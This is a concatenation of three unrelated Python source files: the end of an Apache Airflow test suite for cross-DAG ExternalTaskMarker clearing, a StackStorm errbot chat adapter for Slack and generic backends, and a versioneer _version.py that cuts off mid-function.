assert f"tree?dag_id=dag_{DEFAULT_DATE.date()}" in url
class TestExternalTaskMarker(unittest.TestCase):
def test_serialized_fields(self):
assert {"recursion_depth"}.issubset(ExternalTaskMarker.get_serialized_fields())
def test_serialized_external_task_marker(self):
dag = DAG('test_serialized_external_task_marker', start_date=DEFAULT_DATE)
task = ExternalTaskMarker(
task_id="parent_task",
external_dag_id="external_task_marker_child",
external_task_id="child_task1",
dag=dag,
)
serialized_op = SerializedBaseOperator.serialize_operator(task)
deserialized_op = SerializedBaseOperator.deserialize_operator(serialized_op)
assert deserialized_op.task_type == 'ExternalTaskMarker'
assert getattr(deserialized_op, 'external_dag_id') == 'external_task_marker_child'
assert getattr(deserialized_op, 'external_task_id') == 'child_task1'
@pytest.fixture
def dag_bag_ext():
"""
Create a DagBag with DAGs looking like this. The dotted lines represent external dependencies
set up using ExternalTaskMarker and ExternalTaskSensor.
dag_0: task_a_0 >> task_b_0
|
|
dag_1: ---> task_a_1 >> task_b_1
|
|
dag_2: ---> task_a_2 >> task_b_2
|
|
dag_3: ---> task_a_3 >> task_b_3
"""
clear_db_runs()
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
dag_0 = DAG("dag_0", start_date=DEFAULT_DATE, schedule_interval=None)
task_a_0 = DummyOperator(task_id="task_a_0", dag=dag_0)
task_b_0 = ExternalTaskMarker(
task_id="task_b_0", external_dag_id="dag_1", external_task_id="task_a_1", recursion_depth=3, dag=dag_0
)
task_a_0 >> task_b_0
dag_1 = DAG("dag_1", start_date=DEFAULT_DATE, schedule_interval=None)
task_a_1 = ExternalTaskSensor(
task_id="task_a_1", external_dag_id=dag_0.dag_id, external_task_id=task_b_0.task_id, dag=dag_1
)
task_b_1 = ExternalTaskMarker(
task_id="task_b_1", external_dag_id="dag_2", external_task_id="task_a_2", recursion_depth=2, dag=dag_1
)
task_a_1 >> task_b_1
dag_2 = DAG("dag_2", start_date=DEFAULT_DATE, schedule_interval=None)
task_a_2 = ExternalTaskSensor(
task_id="task_a_2", external_dag_id=dag_1.dag_id, external_task_id=task_b_1.task_id, dag=dag_2
)
task_b_2 = ExternalTaskMarker(
task_id="task_b_2", external_dag_id="dag_3", external_task_id="task_a_3", recursion_depth=1, dag=dag_2
)
task_a_2 >> task_b_2
dag_3 = DAG("dag_3", start_date=DEFAULT_DATE, schedule_interval=None)
task_a_3 = ExternalTaskSensor(
task_id="task_a_3", external_dag_id=dag_2.dag_id, external_task_id=task_b_2.task_id, dag=dag_3
)
task_b_3 = DummyOperator(task_id="task_b_3", dag=dag_3)
task_a_3 >> task_b_3
for dag in [dag_0, dag_1, dag_2, dag_3]:
dag_bag.bag_dag(dag=dag, root_dag=dag)
yield dag_bag
clear_db_runs()
@pytest.fixture
def dag_bag_parent_child():
"""
Create a DagBag with two DAGs looking like this. task_1 of child_dag_1 on day 1 depends on
task_0 of parent_dag_0 on day 1. Therefore, when task_0 of parent_dag_0 on day 1 and day 2
are cleared, parent_dag_0 DagRuns need to be set to running on both days, but child_dag_1
only needs to be set to running on day 1.
day 1 day 2
parent_dag_0 task_0 task_0
|
|
v
child_dag_1 task_1 task_1
"""
clear_db_runs()
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
day_1 = DEFAULT_DATE
with DAG("parent_dag_0", start_date=day_1, schedule_interval=None) as dag_0:
task_0 = ExternalTaskMarker(
task_id="task_0",
external_dag_id="child_dag_1",
external_task_id="task_1",
execution_date=day_1.isoformat(),
recursion_depth=3,
)
with DAG("child_dag_1", start_date=day_1, schedule_interval=None) as dag_1:
ExternalTaskSensor(
task_id="task_1",
external_dag_id=dag_0.dag_id,
external_task_id=task_0.task_id,
execution_date_fn=lambda logical_date: day_1 if logical_date == day_1 else [],
mode='reschedule',
)
for dag in [dag_0, dag_1]:
dag_bag.bag_dag(dag=dag, root_dag=dag)
yield dag_bag
clear_db_runs()
@provide_session
def run_tasks(dag_bag, execution_date=DEFAULT_DATE, session=None):
"""
Run all tasks in the DAGs in the given dag_bag. Return the TaskInstance objects as a dict
keyed by task_id.
"""
tis = {}
for dag in dag_bag.dags.values():
dagrun = dag.create_dagrun(
state=State.RUNNING,
execution_date=execution_date,
start_date=execution_date,
run_type=DagRunType.MANUAL,
session=session,
)
# we use sorting by task_id here because for the test DAG structure of ours
# this is equivalent to topological sort. It would not work in general case
# but it works for our case because we specifically constructed test DAGS
# in the way that those two sort methods are equivalent
tasks = sorted((ti for ti in dagrun.task_instances), key=lambda ti: ti.task_id)
for ti in tasks:
ti.refresh_from_task(dag.get_task(ti.task_id))
tis[ti.task_id] = ti
ti.run(session=session)
session.flush()
session.merge(ti)
assert_ti_state_equal(ti, State.SUCCESS)
return tis
def assert_ti_state_equal(task_instance, state):
"""
Assert state of task_instances equals the given state.
"""
task_instance.refresh_from_db()
assert task_instance.state == state
@provide_session
def clear_tasks(
dag_bag,
dag,
task,
session,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
dry_run=False,
):
"""
Clear the task and its downstream tasks recursively for the dag in the given dagbag.
"""
partial: DAG = dag.partial_subset(task_ids_or_regex=[task.task_id], include_downstream=True)
return partial.clear(
start_date=start_date,
end_date=end_date,
dag_bag=dag_bag,
dry_run=dry_run,
session=session,
)
def test_external_task_marker_transitive(dag_bag_ext):
"""
Test clearing tasks across DAGs.
"""
tis = run_tasks(dag_bag_ext)
dag_0 = dag_bag_ext.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
clear_tasks(dag_bag_ext, dag_0, task_a_0)
ti_a_0 = tis["task_a_0"]
ti_b_3 = tis["task_b_3"]
assert_ti_state_equal(ti_a_0, State.NONE)
assert_ti_state_equal(ti_b_3, State.NONE)
@provide_session
def test_external_task_marker_clear_activate(dag_bag_parent_child, session):
"""
Test clearing tasks across DAGs and make sure the right DagRuns are activated.
"""
dag_bag = dag_bag_parent_child
day_1 = DEFAULT_DATE
day_2 = DEFAULT_DATE + timedelta(days=1)
run_tasks(dag_bag, execution_date=day_1)
run_tasks(dag_bag, execution_date=day_2)
# Assert that dagruns of all the affected dags are set to SUCCESS before tasks are cleared.
for dag in dag_bag.dags.values():
for execution_date in [day_1, day_2]:
dagrun = dag.get_dagrun(execution_date=execution_date, session=session)
dagrun.set_state(State.SUCCESS)
session.flush()
dag_0 = dag_bag.get_dag("parent_dag_0")
task_0 = dag_0.get_task("task_0")
clear_tasks(dag_bag, dag_0, task_0, start_date=day_1, end_date=day_2, session=session)
# Assert that dagruns of all the affected dags are set to QUEUED after tasks are cleared.
# Unaffected dagruns should be left as SUCCESS.
dagrun_0_1 = dag_bag.get_dag('parent_dag_0').get_dagrun(execution_date=day_1, session=session)
dagrun_0_2 = dag_bag.get_dag('parent_dag_0').get_dagrun(execution_date=day_2, session=session)
dagrun_1_1 = dag_bag.get_dag('child_dag_1').get_dagrun(execution_date=day_1, session=session)
dagrun_1_2 = dag_bag.get_dag('child_dag_1').get_dagrun(execution_date=day_2, session=session)
assert dagrun_0_1.state == State.QUEUED
assert dagrun_0_2.state == State.QUEUED
assert dagrun_1_1.state == State.QUEUED
assert dagrun_1_2.state == State.SUCCESS
def test_external_task_marker_future(dag_bag_ext):
"""
Test clearing tasks with no end_date. This is the case when users clear tasks with
Future, Downstream and Recursive selected.
"""
date_0 = DEFAULT_DATE
date_1 = DEFAULT_DATE + timedelta(days=1)
tis_date_0 = run_tasks(dag_bag_ext, execution_date=date_0)
tis_date_1 = run_tasks(dag_bag_ext, execution_date=date_1)
dag_0 = dag_bag_ext.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
# This should clear all tasks on dag_0 to dag_3 on both date_0 and date_1
clear_tasks(dag_bag_ext, dag_0, task_a_0, end_date=None)
ti_a_0_date_0 = tis_date_0["task_a_0"]
ti_b_3_date_0 = tis_date_0["task_b_3"]
ti_b_3_date_1 = tis_date_1["task_b_3"]
assert_ti_state_equal(ti_a_0_date_0, State.NONE)
assert_ti_state_equal(ti_b_3_date_0, State.NONE)
assert_ti_state_equal(ti_b_3_date_1, State.NONE)
def test_external_task_marker_exception(dag_bag_ext):
"""
Clearing across multiple DAGs should raise AirflowException if more levels are being cleared
than allowed by the recursion_depth of the first ExternalTaskMarker being cleared.
"""
run_tasks(dag_bag_ext)
dag_0 = dag_bag_ext.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
task_b_0 = dag_0.get_task("task_b_0")
task_b_0.recursion_depth = 2
with pytest.raises(AirflowException, match="Maximum recursion depth 2"):
clear_tasks(dag_bag_ext, dag_0, task_a_0)
@pytest.fixture
def dag_bag_cyclic():
"""
Create a DagBag with DAGs having cyclic dependencies set up by ExternalTaskMarker and
ExternalTaskSensor.
dag_0: task_a_0 >> task_b_0
^ |
| |
dag_1: | ---> task_a_1 >> task_b_1
| ^
| |
dag_n: | ---> task_a_n >> task_b_n
| |
-----------------------------------------------------
"""
def _factory(depth: int) -> DagBag:
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
dags = []
with DAG("dag_0", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
dags.append(dag)
task_a_0 = DummyOperator(task_id="task_a_0")
task_b_0 = ExternalTaskMarker(
task_id="task_b_0", external_dag_id="dag_1", external_task_id="task_a_1", recursion_depth=3
)
task_a_0 >> task_b_0
for n in range(1, depth):
with DAG(f"dag_{n}", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
dags.append(dag)
task_a = ExternalTaskSensor(
task_id=f"task_a_{n}",
external_dag_id=f"dag_{n-1}",
external_task_id=f"task_b_{n-1}",
)
task_b = ExternalTaskMarker(
task_id=f"task_b_{n}",
external_dag_id=f"dag_{n+1}",
external_task_id=f"task_a_{n+1}",
recursion_depth=3,
)
task_a >> task_b
# Create the last dag which loops back
with DAG(f"dag_{depth}", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
dags.append(dag)
task_a = ExternalTaskSensor(
task_id=f"task_a_{depth}",
external_dag_id=f"dag_{depth-1}",
external_task_id=f"task_b_{depth-1}",
)
task_b = ExternalTaskMarker(
task_id=f"task_b_{depth}",
external_dag_id="dag_0",
external_task_id="task_a_0",
recursion_depth=2,
)
task_a >> task_b
for dag in dags:
dag_bag.bag_dag(dag=dag, root_dag=dag)
return dag_bag
return _factory
def test_external_task_marker_cyclic_deep(dag_bag_cyclic):
"""
Tests clearing across multiple DAGs that have cyclic dependencies. AirflowException should be
raised.
"""
dag_bag = dag_bag_cyclic(10)
run_tasks(dag_bag)
dag_0 = dag_bag.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
with pytest.raises(AirflowException, match="Maximum recursion depth 3"):
clear_tasks(dag_bag, dag_0, task_a_0)
def test_external_task_marker_cyclic_shallow(dag_bag_cyclic):
"""
Tests clearing across multiple DAGs that have cyclic dependencies shallower
than recursion_depth
"""
dag_bag = dag_bag_cyclic(2)
run_tasks(dag_bag)
dag_0 = dag_bag.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
tis = clear_tasks(dag_bag, dag_0, task_a_0, dry_run=True)
assert [
("dag_0", "task_a_0"),
("dag_0", "task_b_0"),
("dag_1", "task_a_1"),
("dag_1", "task_b_1"),
("dag_2", "task_a_2"),
("dag_2", "task_b_2"),
] == sorted((ti.dag_id, ti.task_id) for ti in tis)
@pytest.fixture
def dag_bag_multiple():
"""
Create a DagBag containing two DAGs, linked by multiple ExternalTaskMarker.
"""
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
daily_dag = DAG("daily_dag", start_date=DEFAULT_DATE, schedule_interval="@daily")
agg_dag = DAG("agg_dag", start_date=DEFAULT_DATE, schedule_interval="@daily")
dag_bag.bag_dag(dag=daily_dag, root_dag=daily_dag)
dag_bag.bag_dag(dag=agg_dag, root_dag=agg_dag)
daily_task = DummyOperator(task_id="daily_tas", dag=daily_dag)
begin = DummyOperator(task_id="begin", dag=agg_dag)
for i in range(8):
task = ExternalTaskMarker(
task_id=f"{daily_task.task_id}_{i}",
external_dag_id=daily_dag.dag_id,
external_task_id=daily_task.task_id,
execution_date="{{ macros.ds_add(ds, -1 * %s) }}" % i,
dag=agg_dag,
)
begin >> task
yield dag_bag
def test_clear_multiple_external_task_marker(dag_bag_multiple):
"""
Test clearing a dag that has multiple ExternalTaskMarker.
"""
agg_dag = dag_bag_multiple.get_dag("agg_dag")
tis = run_tasks(dag_bag_multiple, execution_date=DEFAULT_DATE)
session = settings.Session()
try:
qry = session.query(TaskInstance).filter(
TaskInstance.state == State.NONE, TaskInstance.dag_id.in_(dag_bag_multiple.dag_ids)
)
assert agg_dag.clear(dag_bag=dag_bag_multiple) == len(tis) == qry.count() == 10
finally:
session.close()
@pytest.fixture
def dag_bag_head_tail():
"""
Create a DagBag containing one DAG, with task "head" depending on task "tail" of the
previous execution_date.
20200501 20200502 20200510
+------+ +------+ +------+
| head | -->head | --> -->head |
| | | / | | | / / | | |
| v | / | v | / / | v |
| body | / | body | / ... / | body |
| | |/ | | |/ / | | |
| v / | v / / | v |
| tail/| | tail/| / | tail |
+------+ +------+ +------+
"""
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
with DAG("head_tail", start_date=DEFAULT_DATE, schedule_interval="@daily") as dag:
head = ExternalTaskSensor(
task_id='head',
external_dag_id=dag.dag_id,
external_task_id="tail",
execution_delta=timedelta(days=1),
mode="reschedule",
)
body = DummyOperator(task_id="body")
tail = ExternalTaskMarker(
task_id="tail",
external_dag_id=dag.dag_id,
external_task_id=head.task_id,
execution_date="{{ macros.ds_add(ds, 1) }}",
)
head >> body >> tail
dag_bag.bag_dag(dag=dag, root_dag=dag)
return dag_bag
@provide_session
def test_clear_overlapping_external_task_marker(dag_bag_head_tail, session):
dag: DAG = dag_bag_head_tail.get_dag('head_tail')
# "Run" 10 times.
for delta in range(0, 10):
execution_date = DEFAULT_DATE + timedelta(days=delta)
dagrun = DagRun(
dag_id=dag.dag_id,
state=DagRunState.SUCCESS,
execution_date=execution_date,
run_type=DagRunType.MANUAL,
run_id=f"test_{delta}",
)
session.add(dagrun)
for task in dag.tasks:
ti = TaskInstance(task=task)
dagrun.task_instances.append(ti)
ti.state = TaskInstanceState.SUCCESS
session.flush()
# The next two lines are doing the same thing. Clearing the first "head" with "Future"
# selected is the same as not selecting "Future". They should take similar amount of
# time too because dag.clear() uses visited_external_tis to keep track of visited ExternalTaskMarker.
assert dag.clear(start_date=DEFAULT_DATE, dag_bag=dag_bag_head_tail, session=session) == 30
assert (
dag.clear(
start_date=DEFAULT_DATE,
end_date=execution_date,
dag_bag=dag_bag_head_tail,
session=session,
)
== 30
)
|
|
# coding:utf-8
import abc
import logging
LOG = logging.getLogger(__name__)
class AbstractChatAdapterFactory(metaclass=abc.ABCMeta):
@abc.abstractmethod
def slack_adapter(self, bot_plugin):
pass
@abc.abstractmethod
def generic_adpater(self, bot_plugin):
pass
class ChatAdapterFactory(AbstractChatAdapterFactory):
@staticmethod
def slack_adapter(bot_plugin):
return SlackChatAdapter(bot_plugin)
@staticmethod
def generic_adapter(bot_plugin):
return GenericChatAdapter(bot_plugin)
class AbstractChatAdapter(metaclass=abc.ABCMeta):
@abc.abstractmethod
def get_username(self, msg):
pass
@abc.abstractmethod
def post_message(self, whisper, message, user, channel, extra):
pass
@abc.abstractmethod
def format_help(self, help_strings):
pass
class GenericChatAdapter(AbstractChatAdapter):
def __init__(self, bot_plugin):
self.botplugin = bot_plugin
def get_username(self, msg):
"""
Return the user name from an errbot message object.
"""
return str(msg.frm)
def format_help(self, help_strings):
help_text = ""
pack = ""
for help_obj in help_strings:
if pack != help_obj["pack"]:
help_text += "[{}]\n".format(help_obj["pack"])
pack = help_obj["pack"]
help_text += "\t{}{} {} - {}\n".format(
self.botplugin.st2config.bot_prefix,
self.botplugin.st2config.plugin_prefix,
help_obj["display"],
help_obj["description"],
)
return help_text
def post_message(self, whisper, message, user, channel, extra):
"""
Post messages to the chat backend.
"""
LOG.debug("Posting Message: whisper={}, message={}, user={}, channel={}, extra={}".format(
whisper,
message,
user,
channel,
extra)
)
user_id = None
channel_id = None
if user is not None:
try:
user_id = self.botplugin.build_identifier(user)
except ValueError as err:
LOG.warning("Invalid user identifier '{}'. {}".format(channel, err))
if channel is not None:
try:
channel_id = self.botplugin.build_identifier(channel)
except ValueError as err:
LOG.warning("Invalid channel identifier '{}'. {}".format(channel, err))
# Only whisper to users, not channels.
if whisper and user_id is not None:
target_id = user_id
else:
if channel_id is None:
# Fall back to user if no channel is set.
target_id = user_id
else:
target_id = channel_id
if target_id is None:
LOG.error("Unable to post message as there is no user or channel destination.")
else:
self.botplugin.send(target_id, message)
class SlackChatAdapter(AbstractChatAdapter):
def __init__(self, bot_plugin):
self.botplugin = bot_plugin
def get_username(self, msg):
"""
Return the user name from an errbot message object.
Slack identity tuple (username, userid, channelname, channelid)
"""
username, user_id, channel_name, channel_id = \
self.botplugin._bot.extract_identifiers_from_string(str(msg.frm))
if username is None:
name = "#{}".format(channel_name)
else:
name = "@{}".format(username)
return name
def post_message(self, whisper, message, user, channel, extra):
"""
Post messages to the chat backend.
"""
LOG.debug("Posting Message: whisper={}, message={}, user={}, channel={}, extra={}".format(
whisper,
message,
user,
channel,
extra)
)
user_id = None
channel_id = None
if user is not None:
try:
user_id = self.botplugin.build_identifier(user)
except ValueError as err:
LOG.warning("Invalid user identifier '{}'. {}".format(channel, err))
if channel is not None:
try:
channel_id = self.botplugin.build_identifier(channel)
except ValueError as err:
LOG.warning("Invalid channel identifier '{}'. {}".format(channel, err))
# Only whisper to users, not channels.
if whisper and user_id is not None:
target_id = user_id
else:
if channel_id is None:
# Fall back to user if no channel is set.
target_id = user_id
else:
target_id = channel_id
if target_id is None:
LOG.error("Unable to post message as there is no user or channel destination.")
else:
if extra is None or extra is {}:
self.botplugin.send(target_id, message)
else:
LOG.debug("Send card using backend {}".format(self.botplugin.mode))
backend = extra.get(self.botplugin.mode, {})
LOG.debug("fields {}".format(
tuple(
[
(field.get("title"), field.get("value"))
for field in backend.get("fields", [])
]
)
))
if backend is not {}:
kwargs = {
"body": message,
"to": target_id,
"summary": backend.get("pretext"),
"title": backend.get("title"),
"link": backend.get("title_link"),
"image": backend.get("image_url"),
"thumbnail": backend.get("thumb_url"),
"color": backend.get("color"),
"fields": tuple([
(field.get("title"), field.get("value"))
for field in backend.get("fields", [])
])
}
LOG.debug("Type: {}, Args: {}".format(type(kwargs), kwargs))
self.botplugin.send_card(**kwargs)
else:
LOG.warning("{} not found.".format(self.mode))
self.botplugin.send(target_id, message)
def format_help(self, help_strings):
help_text = ""
pack = ""
for help_obj in help_strings:
if pack != help_obj["pack"]:
help_text += "\n**{}**\n".format(help_obj["pack"])
pack = help_obj["pack"]
help_text += "\t{}{} {} - _{}_\n".format(
self.botplugin.st2config.bot_prefix,
self.botplugin.st2config.plugin_prefix,
help_obj["display"],
help_obj["description"],
)
return help_text
|
|
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.16 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
keywords = {"refnames": git_refnames, "full": git_full}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = "v"
cfg.parentdir_prefix = "obztak-"
cfg.versionfile_source = "maglites/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
return None
return stdout
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes
both the project name and a version string.
"""
dirname = os.path.basename(root)
if not dirname.startswith(parentdir_prefix):
if verbose:
print("guessing rootdir is '%s', but '%s' doesn't start with "
"prefix '%s'" % (root, dirname, parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None}
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs-tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None
}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags"}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
if not os.path.exists(os.path.join(root, ".git")):
if verbose:
print("no .git in %s" % root)
raise NotThisMethod("no .git directory")
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"]}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
